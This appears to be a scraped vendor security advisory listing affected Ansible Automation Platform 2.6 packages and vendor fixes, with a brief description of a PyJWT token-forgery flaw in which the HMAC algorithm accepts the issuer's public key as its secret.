| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch | — |
A flaw was found in PyJWT, a Python library for JSON Web Token (JWT) implementation. When decoding JWTs, the library fails to validate the use of JSON Web Keys (JWK) in the HMAC algorithm while also supporting asymmetric algorithms. This allows a remote attacker to use the issuer's public key as the secret key for the HMAC algorithm, leading to the ability to forge JWTs. This vulnerability can result in authentication bypass or unauthorized access.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch | — | ||
